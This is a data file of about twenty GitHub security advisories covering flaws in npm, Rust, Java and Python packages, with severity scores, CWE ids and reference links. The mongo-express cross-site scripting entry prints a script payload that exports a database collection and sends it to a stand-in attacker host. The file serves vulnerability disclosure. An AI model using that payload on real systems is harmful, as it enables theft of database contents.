GHSA-8whr-v3gm-w8h9
|
Command Injection in node-rules
|
Versions of `node-rules` prior to 5.0.0 are vulnerable to Command Injection. The package fails to sanitize input rules and passes it directly to an `eval` call when using the `fromJSON` function. This may allow attackers to execute arbitrary code in the system if the rules are user-controlled.
## Recommendation
Upgrade to version 5.0.0 or later.
| null |
2021-10-04T21:08:30Z
|
2020-09-03T15:51:04Z
|
HIGH
| 8.1
|
{'CWE-78'}
|
{'https://github.com/mithunsatheesh/node-rules/issues/84', 'https://www.npmjs.com/advisories/1499', 'https://snyk.io/vuln/SNYK-JS-NODERULES-560426', 'https://github.com/advisories/GHSA-8whr-v3gm-w8h9'}
| null |
GHSA
|
GHSA-v52p-hfjf-wg88
|
Division by zero in TFLite's implementation of `SpaceToBatchNd`
|
### Impact
The implementation of the `SpaceToBatchNd` TFLite operator is [vulnerable to a division by zero error](https://github.com/tensorflow/tensorflow/blob/412c7d9bb8f8a762c5b266c9e73bfa165f29aac8/tensorflow/lite/kernels/space_to_batch_nd.cc#L82-L83):
```cc
TF_LITE_ENSURE_EQ(context, final_dim_size % block_shape[dim], 0);
output_size->data[dim + 1] = final_dim_size / block_shape[dim];
```
An attacker can craft a model such that one dimension of the `block` input is 0. Hence, the corresponding value in `block_shape` is 0.
### Patches
We have patched the issue in GitHub commit [6d36ba65577006affb272335b7c1abd829010708](https://github.com/tensorflow/tensorflow/commit/6d36ba65577006affb272335b7c1abd829010708).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability has been reported by members of the Aivul Team from Qihoo 360.
|
{'CVE-2021-29597'}
|
2021-05-21T14:27:54Z
|
2021-05-21T14:27:54Z
|
LOW
| 2.5
|
{'CWE-369'}
|
{'https://github.com/tensorflow/tensorflow/commit/6d36ba65577006affb272335b7c1abd829010708', 'https://github.com/advisories/GHSA-v52p-hfjf-wg88', 'https://nvd.nist.gov/vuln/detail/CVE-2021-29597', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-v52p-hfjf-wg88'}
| null |
GHSA
|
GHSA-r626-fc64-3q28
|
Data race in abox
|
An issue was discovered in the abox crate before 0.4.1 for Rust.
Affected versions of this crate implements `Send`/`Sync` for `AtomicBox<T>` without requiring `T: Send`/`T: Sync`. This allows to create data races to `T: !Sync` and send `T: !Send` to another thread.
Such behavior breaks the compile-time thread safety guarantees of Rust, and allows users to incur undefined behavior using safe Rust (e.g. memory corruption from data race).
The flaw was corrected in commit 34c2b9e by adding trait bound `T: Send` to `Send` impl for `AtomicBox<T>` and trait bound `T: Sync` to `Sync` impl for `AtomicBox<T>`.
|
{'CVE-2020-36441'}
|
2021-08-25T20:59:06Z
|
2021-08-25T20:59:06Z
|
HIGH
| 8.1
|
{'CWE-119', 'CWE-362'}
|
{'https://rustsec.org/advisories/RUSTSEC-2020-0121.html', 'https://github.com/SonicFrog/abox/pull/2', 'https://github.com/SonicFrog/abox/issues/1', 'https://github.com/SonicFrog/abox/commit/34c2b9e', 'https://nvd.nist.gov/vuln/detail/CVE-2020-36441', 'https://github.com/advisories/GHSA-r626-fc64-3q28'}
| null |
GHSA
|
GHSA-g5q2-fcg9-j526
|
Malicious Package in hsf-clients
|
All versions of `hsf-clients` contain malicious code. The package uploads system information to a remote server, downloads a file and executes it.
## Recommendation
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
| null |
2021-09-30T19:46:51Z
|
2020-09-03T17:40:18Z
|
CRITICAL
| 9.8
|
{'CWE-506'}
|
{'https://github.com/advisories/GHSA-g5q2-fcg9-j526', 'https://www.npmjs.com/advisories/1054'}
| null |
GHSA
|
GHSA-hrpp-f84w-xhfg
|
Outdated Static Dependency in vue-moment
|
Versions of `vue-moment` prior to 4.1.0 contain an Outdated Static Dependency. The package depends on `moment` and has it loaded statically instead of as a dependency that can be updated. It has `moment@2.19.1` that contains a Regular Expression Denial of Service vulnerability.
## Recommendation
Upgrade to version 4.1.0 or later.
| null |
2021-10-04T19:13:24Z
|
2020-09-04T16:55:06Z
|
MODERATE
| 5.3
|
{'CWE-1104'}
|
{'https://snyk.io/vuln/SNYK-JS-VUEMOMENT-538934', 'https://github.com/advisories/GHSA-hrpp-f84w-xhfg', 'https://github.com/brockpetrie/vue-moment/commit/a265e54660a7181a6795a12a97cebac5b305746e', 'https://www.npmjs.com/advisories/532', 'https://www.npmjs.com/advisories/1425'}
| null |
GHSA
|
GHSA-34p9-f4q3-c4r7
|
Improper Certificate Validation in openssl
|
An issue was discovered in the openssl crate before 0.9.0 for Rust. There is an SSL/TLS man-in-the-middle vulnerability because certificate verification is off by default and there is no API for hostname verification.
|
{'CVE-2016-10931'}
|
2021-08-25T20:43:11Z
|
2021-08-25T20:43:11Z
|
HIGH
| 8.1
|
{'CWE-295'}
|
{'https://github.com/sfackler/rust-openssl/releases/tag/v0.9.0', 'https://rustsec.org/advisories/RUSTSEC-2016-0001.html', 'https://github.com/advisories/GHSA-34p9-f4q3-c4r7', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10931'}
| null |
GHSA
|
GHSA-6v7w-535j-rq5m
|
Moderate severity vulnerability that affects org.springframework:spring-core
|
Pivotal Spring Framework before 3.2.14 and 4.x before 4.1.7 do not properly process inline DTD declarations when DTD is not entirely disabled, which allows remote attackers to cause a denial of service (memory consumption and out-of-memory errors) via a crafted XML file.
|
{'CVE-2015-3192'}
|
2021-09-02T18:26:06Z
|
2018-10-17T20:29:12Z
|
MODERATE
| 5.5
|
{'CWE-119'}
|
{'https://lists.debian.org/debian-lts-announce/2019/07/msg00012.html', 'https://access.redhat.com/errata/RHSA-2016:1218', 'http://rhn.redhat.com/errata/RHSA-2016-1592.html', 'http://rhn.redhat.com/errata/RHSA-2016-1593.html', 'http://rhn.redhat.com/errata/RHSA-2016-2035.html', 'https://access.redhat.com/errata/RHSA-2016:1219', 'http://www.securitytracker.com/id/1036587', 'http://pivotal.io/security/cve-2015-3192', 'https://nvd.nist.gov/vuln/detail/CVE-2015-3192', 'https://jira.spring.io/browse/SPR-13136', 'https://github.com/advisories/GHSA-6v7w-535j-rq5m', 'http://lists.fedoraproject.org/pipermail/package-announce/2015-July/162015.html', 'http://lists.fedoraproject.org/pipermail/package-announce/2015-July/162017.html', 'http://www.securityfocus.com/bid/90853', 'http://rhn.redhat.com/errata/RHSA-2016-2036.html'}
| null |
GHSA
|
GHSA-whrh-9j4q-g7ph
|
CSRF Vulnerability in polaris-website
|
### Impact
CSRF vulnerability:
In some very specific circumstances, an attacker would be able to update your settings.
Basically you would need to navigate to hackersite.com while logged into our panel. Then they could modify your settings. They couldn't check if it worked, nor could they read your settings.
### Patches
As of v1.1.1 this has been patched by implementing the Double submit pattern using a cookie.
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Polaris-React](https://github.com/polaris-rbx/polaris-react)
* Email us at [hi@nezto.re](mailto:hi@nezto.re)
* Join our discord (preferred): https://discord.gg/QevWabU
| null |
2021-09-23T18:38:12Z
|
2020-08-05T21:43:19Z
|
MODERATE
| 6.8
|
{'CWE-352'}
|
{'https://medium.com/cross-site-request-forgery-csrf/double-submit-cookie-pattern-65bb71d80d9f', 'https://github.com/polaris-rbx/Polaris-React/security/advisories/GHSA-whrh-9j4q-g7ph', 'https://github.com/advisories/GHSA-whrh-9j4q-g7ph', 'https://github.com/polaris-rbx/Polaris-React/commit/b64673d91e83c0737616a0770d8208727730808b', 'https://snyk.io/vuln/SNYK-JS-POLARISWEBSITE-597473', 'https://www.barracuda.com/glossary/csrf', 'https://owasp.org/www-community/attacks/csrf'}
| null |
GHSA
|
GHSA-rvfc-g8j5-9ccf
|
Generation of Error Message Containing Sensitive Information in keybloack
|
A flaw was found in Keycloak 7.0.1. A logged in user can do an account email enumeration attack.
|
{'CVE-2020-1717'}
|
2022-02-09T00:59:06Z
|
2022-02-09T00:59:06Z
|
MODERATE
| 2.7
|
{'CWE-209'}
|
{'https://issues.jboss.org/browse/KEYCLOAK-12014', 'https://github.com/advisories/GHSA-rvfc-g8j5-9ccf', 'https://bugzilla.redhat.com/show_bug.cgi?id=1796281', 'https://nvd.nist.gov/vuln/detail/CVE-2020-1717'}
| null |
GHSA
|
GHSA-fpj7-9xm6-8hgr
|
Observable Discrepancy and Observable Timing Discrepancy in Jenkins Configuration as Code Plugin
|
Jenkins Configuration as Code Plugin 1.55 and earlier used a non-constant time comparison function when validating an authentication token allowing attackers to use statistical methods to obtain a valid authentication token.
|
{'CVE-2022-23106'}
|
2022-01-21T23:38:30Z
|
2022-01-21T23:38:30Z
|
MODERATE
| 5.3
|
{'CWE-208', 'CWE-203'}
|
{'http://www.openwall.com/lists/oss-security/2022/01/12/6', 'https://www.jenkins.io/security/advisory/2022-01-12/#SECURITY-2141', 'https://github.com/advisories/GHSA-fpj7-9xm6-8hgr', 'https://nvd.nist.gov/vuln/detail/CVE-2022-23106'}
| null |
GHSA
|
GHSA-qr95-4mq5-r3fh
|
Phar unserialization vulnerability in phpMussel
|
### Impact
_What kind of vulnerability is it? Who is impacted?_
Anyone using >= v1.0.0 < v1.6.0.
### Patches
_Has the problem been patched? What versions should users upgrade to?_
Yes. Upgrading to at least >= v1.6.0 will resolve the problem (though upgrading to v2, which is the current major version, would be preferable, seeing as v1 is kind of old now and will most likely be marked as EoL when v3 is released in the near future).
### Workarounds
_Is there a way for users to fix or remediate the vulnerability without upgrading?_
Yes. In the package's configuration, disable archive checking by setting `check_archives` to `false` (thus avoiding execution of the affected parts of the codebase entirely).
### References
_Are there any links users can visit to find out more?_
Yes. The vulnerability is documented at [SECURITY.md](https://github.com/phpMussel/phpMussel/security/policy) and also at [#167](https://github.com/phpMussel/phpMussel/issues/167).
### For more information
If you have any questions or comments about this advisory:
* Comment at the issue linked to this advisory, or..
* Contact [the package author](https://github.com/Maikuolan) ([082e6bc1046fab95](https://peegeepee.com/046FAB95)).
|
{'CVE-2020-4043'}
|
2021-01-08T20:12:51Z
|
2020-06-10T19:40:30Z
|
HIGH
| 7.7
|
{'CWE-502'}
|
{'https://github.com/phpMussel/phpMussel/pull/173', 'https://github.com/phpMussel/phpMussel/commit/97f25973433921c1f953430f32d3081adc4851a4', 'https://nvd.nist.gov/vuln/detail/CVE-2020-4043', 'https://github.com/advisories/GHSA-qr95-4mq5-r3fh', 'https://github.com/phpMussel/phpMussel/security/advisories/GHSA-qr95-4mq5-r3fh', 'https://github.com/phpMussel/phpMussel/security/policy#currently-known-vulnerabilities', 'https://github.com/phpMussel/phpMussel/issues/167'}
| null |
GHSA
|
GHSA-pqqp-xmhj-wgcw
|
Data race in crossbeam-deque
|
### Impact
In the affected version of this crate, the result of the race condition is that one or more tasks in the worker queue can be popped twice instead of other tasks that are forgotten and never popped. If tasks are allocated on the heap, this can cause double free and a memory leak. If not, this still can cause a logical bug.
Crates using `Stealer::steal`, `Stealer::steal_batch`, or `Stealer::steal_batch_and_pop` are affected by this issue.
### Patches
This has been fixed in crossbeam-deque 0.8.1 and 0.7.4.
### Credits
This issue was reported and fixed by Maor Kleinberger.
|
{'CVE-2021-32810'}
|
2022-04-19T19:03:04Z
|
2021-08-25T21:01:15Z
|
CRITICAL
| 9.8
|
{'CWE-362'}
|
{'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AYBSLIYFANZLCYWOGTIYZUM26TJRH7WU/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WGB2H35CTZDHOV3VLC5BM6VFGURLLVRP/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AWHNNBJCU4EHA2X5ZAMJMGLDUYS5FEPP/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7EZILHZDRGDPOBQ4KTW3E5PPMKLHGH5N/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCLMH7B7B2MF55ET4NQNPH7JWISFX4RT/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VQZIEJQBV3S72BHD5GKJQF3NVYNRV5CF/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQDIBB7VR3ER52FMSMNJPAWNDO5SITCE/', 'https://rustsec.org/advisories/RUSTSEC-2021-0093.html', 'https://github.com/crossbeam-rs/crossbeam/security/advisories/GHSA-pqqp-xmhj-wgcw', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EW5B2VTDVMJ6B3DA4VLMAMW2GGDCE2BK/', 'https://github.com/advisories/GHSA-pqqp-xmhj-wgcw', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U3LSN3B43TJSFIOB3QLPBI3RCHRU5BLO/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XFBZWCLG7AGLJO4A7K5IMJVPLSWZ5TJP/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LCIBFGBSL3JSVJQTNEDEIMZGZF23N2KE/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TFUBWBYCPSSXTJGEAQ67CJUNQJBOCM26/', 'https://nvd.nist.gov/vuln/detail/CVE-2021-32810', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RRPKBRXCRNGNMVFQPFD4LM3QKPEMBQQR/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CY5T3FCE4MUYSPKEWICLVJBBODGJ6SZE/'}
| null |
GHSA
|
GHSA-pp4v-55vr-9gxh
|
Regular Expression Denial of Service in riot-compiler
|
Affected versions of `riot-compiler` are susceptible to a regular expression denial of service vulnerability.
## Recommendation
Update to version 2.3.22 or later.
|
{'CVE-2016-10527'}
|
2021-01-08T18:20:42Z
|
2019-02-18T23:39:13Z
|
MODERATE
| 0
|
{'CWE-400'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2016-10527', 'https://github.com/advisories/GHSA-pp4v-55vr-9gxh', 'https://nodesecurity.io/advisories/86', 'https://www.npmjs.com/advisories/86', 'https://github.com/riot/compiler/issues/46'}
| null |
GHSA
|
GHSA-v4rh-8p82-6h5w
|
Regular expression denial of service in url-regex
|
all versions of url-regex are vulnerable to Regular Expression Denial of Service. An attacker providing a very long string in String.test can cause a Denial of Service.
|
{'CVE-2020-7661'}
|
2021-09-22T18:35:59Z
|
2020-06-22T14:39:03Z
|
HIGH
| 7.5
|
{'CWE-400'}
|
{'https://github.com/kevva/url-regex/issues/70', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7661', 'https://snyk.io/vuln/SNYK-JS-URLREGEX-569472', 'https://github.com/advisories/GHSA-v4rh-8p82-6h5w'}
| null |
GHSA
|
GHSA-x3v4-pxvm-63j8
|
HTTP Request Smuggling in reel
|
reel through 0.6.1 allows Request Smuggling attacks due to incorrect Content-Length and Transfer encoding header parsing. It is possible to conduct HTTP request smuggling attacks by sending the Content-Length header twice. Furthermore, invalid Transfer Encoding headers were found to be parsed as valid which could be leveraged for TECL smuggling attacks. Note, This project is deprecated, and is not maintained any more.
|
{'CVE-2020-7659'}
|
2021-05-24T18:13:36Z
|
2021-05-24T18:13:36Z
|
MODERATE
| 7.5
|
{'CWE-444'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2020-7659', 'https://github.com/advisories/GHSA-x3v4-pxvm-63j8', 'https://snyk.io/vuln/SNYK-RUBY-REEL-569135'}
| null |
GHSA
|
GHSA-2ccw-7px8-vmpf
|
Open Redirect in Flask-AppBuilder
|
Flask-AppBuilder is an application development framework built on top of Flask. Versions prior to 3.4.5 contain an open redirect vulnerability when using the database authentication login page. There are no known workarounds. Users are recommended to upgrade to version 3.4.5 or later.
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Flask-AppBuilder](https://github.com/dpgaspar/Flask-AppBuilder)
|
{'CVE-2022-24776'}
|
2022-04-07T00:09:52Z
|
2022-03-25T19:27:39Z
|
MODERATE
| 6.1
|
{'CWE-601'}
|
{'https://github.com/dpgaspar/Flask-AppBuilder/pull/1804', 'https://github.com/dpgaspar/Flask-AppBuilder/releases/tag/v3.4.5', 'https://github.com/dpgaspar/Flask-AppBuilder/pull/1804/commits/5214d975ebad2ff32057443d2cc20fef1c04d0ea', 'https://github.com/advisories/GHSA-2ccw-7px8-vmpf', 'https://nvd.nist.gov/vuln/detail/CVE-2022-24776', 'https://github.com/dpgaspar/Flask-AppBuilder/security/advisories/GHSA-2ccw-7px8-vmpf'}
| null |
GHSA
|
GHSA-cg54-gpgr-4rm6
|
user-readable api tokens in systemd units for JupyterHub
|
### Impact
user API tokens issued to single-user servers are specified in the environment of systemd units, which are accessible to all users.
In particular, the-littlest-jupyterhub is affected, which uses systemdspawner by default.
### Patches
Patched in jupyterhub-systemdspawner v0.15
### Workarounds
No workaround other than upgrading systemdspawner to 0.15
### For more information
If you have any questions or comments about this advisory:
* Open a thread in [the Jupyter forum](https://discourse.jupyter.org)
* Email us at [security@ipython.org](mailto:security@ipython.org)
|
{'CVE-2020-26261'}
|
2022-04-19T19:02:42Z
|
2020-12-09T16:27:43Z
|
HIGH
| 7.9
|
{'CWE-668'}
|
{'https://pypi.org/project/jupyterhub-systemdspawner/', 'https://nvd.nist.gov/vuln/detail/CVE-2020-26261', 'https://github.com/jupyterhub/systemdspawner/commit/a4d08fd2ade1cfd0ef2c29dc221e649345f23580', 'https://github.com/jupyterhub/systemdspawner/blob/master/CHANGELOG.md#v015', 'https://github.com/advisories/GHSA-cg54-gpgr-4rm6', 'https://github.com/jupyterhub/systemdspawner/security/advisories/GHSA-cg54-gpgr-4rm6'}
| null |
GHSA
|
GHSA-7p8h-86p5-wv3p
|
Cross-site scripting
|
Two kinds of XSS were found:
1. As mentioned in https://github.com/mongo-express/mongo-express/issues/577 when the content of a cell grows larger than supported size, clicking on a row will show full document unescaped, however this needs admin interaction on cell.
2. Data cells identified as media will be rendered as media, without being sanitized. Example of different renders: image, audio, video, etc.
### Impact
As an example of type 1 attack, an unauthorized user who only can send a large amount of data in a field of a document may use this payload:
```JSON
{"someField": "long string here to surpass the limit of document ...... <script> await fetch('http://localhost:8081/db/testdb/export/users').then( async res => await fetch('http://attacker.com?backup='+encodeURIComponent((await res.text())))) </script>" }
```
This will send an export of a collection to the attacker without even admin knowing. Other types of attacks such as dropping a database\collection are also possible.
### Patches
Upgrade to `v1.0.0-alpha.4`
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [mongo-express](https://github.com/mongo-express/mongo-express/issues/new)
* Email me at [jafar.akhoondali@gmail.com](mailto:jafar.akhoondali@gmail.com)
|
{'CVE-2021-21422'}
|
2022-04-19T19:03:00Z
|
2021-06-28T17:18:04Z
|
HIGH
| 8.1
|
{'CWE-79'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2021-21422', 'https://github.com/mongo-express/mongo-express/issues/577', 'https://github.com/advisories/GHSA-7p8h-86p5-wv3p', 'https://github.com/mongo-express/mongo-express/commit/f5e0d4931f856f032f22664b5e5901d5950cfd4b', 'https://github.com/mongo-express/mongo-express/security/advisories/GHSA-7p8h-86p5-wv3p'}
| null |
GHSA
|
GHSA-4448-rc82-fcr7
|
Path Traversal in serve-here.js
|
Versions of serve-here.js prior to 1.2.0 are vulnerable to Path Traversal. The package fails to sanitize URLs, allowing attackers to access server files outside of the served folder using relative paths.
|
{'CVE-2019-5444'}
|
2021-09-22T18:40:57Z
|
2021-09-22T18:40:57Z
|
MODERATE
| 5.3
|
{'CWE-22'}
|
{'https://hackerone.com/reports/569966', 'https://nvd.nist.gov/vuln/detail/CVE-2019-5444', 'https://www.npmjs.com/advisories/1019', 'https://github.com/advisories/GHSA-4448-rc82-fcr7'}
| null |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.